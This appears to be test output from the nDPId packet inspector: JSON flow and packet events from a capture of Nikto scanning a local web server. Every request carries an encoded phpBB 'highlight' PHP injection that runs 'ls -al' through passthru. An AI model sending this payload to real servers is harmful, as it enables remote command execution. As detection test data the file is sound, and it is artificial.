+00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01210{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 